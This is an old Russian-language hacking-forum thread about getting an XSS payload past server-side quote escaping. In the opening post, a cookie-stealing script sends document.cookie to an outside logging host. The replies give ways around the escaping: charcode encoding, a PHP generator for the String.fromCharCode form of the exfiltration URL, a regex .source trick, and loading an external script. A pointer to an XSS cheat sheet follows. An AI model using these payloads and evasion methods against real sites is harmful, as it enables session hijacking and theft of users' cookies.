ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Xss и экранирование
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss и экранирование
  #1  
Старый 15.07.2008, 14:48
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию Xss и экранирование
Кидаю в болталку, т.к. тема примитивная ИМХО
Ну в общем на серваке экранирование и жаваскрипт типа
Код:
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
превратится в
Код:
<script>img = new Image(); img.src = \"http://old.antichat.ru/cgi-bin/s.jpg?\"+document.cookie;</script>
и работать небудет, чё делать?
Те кто знают JS спокойно решают эту проблему, а я без понятия, гуглил, ничё не нащёл...
 
Ответить с цитированием

  #2  
Старый 15.07.2008, 15:11
Аватар для Chaak
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию
Закодируй в чаркоды
 
Ответить с цитированием

  #3  
Старый 15.07.2008, 15:12
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
Чёто как-то нет такой функции как я понял из ошибки жаваскрипта...
Но ход мысли я понял... Хмм... Ану щас попробую ord()+ord()+... моджет получится
Да в нём и функции ord штоле нету....

Короче пойду я втыкать это хреново шифрование, спасибо

Погуглив догнал, вот сбацал скрипт, может кому надо будет
PHP код:
<?php
$s 'http://old.antichat.ru/cgi-bin/s.jpg?';
$ord = array();
for($i=0;$i<strlen($s);$i++) {
    $ord[] = ord($s[$i]);
}
$ord implode(',',$ord);
echo "String.fromCharCode($ord)";
?>
Последний раз редактировалось Ponchik; 15.07.2008 в 15:24..
 
Ответить с цитированием

  #4  
Старый 15.07.2008, 15:25
Аватар для astrologer
astrologer
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349

Репутация: 808


По умолчанию
/строка/.source;
/строка/.toString().slice(1, -1);

P.S.
<script src=http://whatever></script>
Последний раз редактировалось astrologer; 15.07.2008 в 15:30..
 
Ответить с цитированием

  #5  
Старый 15.07.2008, 18:30
Аватар для mr.The
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию
инклуд юзай.
и вообще на вот почитай: _http://ha.ckers.org/xss.html
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Microsoft addresses XSS in Internet Explorer Fugitif Forum for discussion of ANTICHAT 3 08.07.2008 03:47
Темная сторона Xss Constantine Авторские статьи 20 14.06.2008 16:28
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ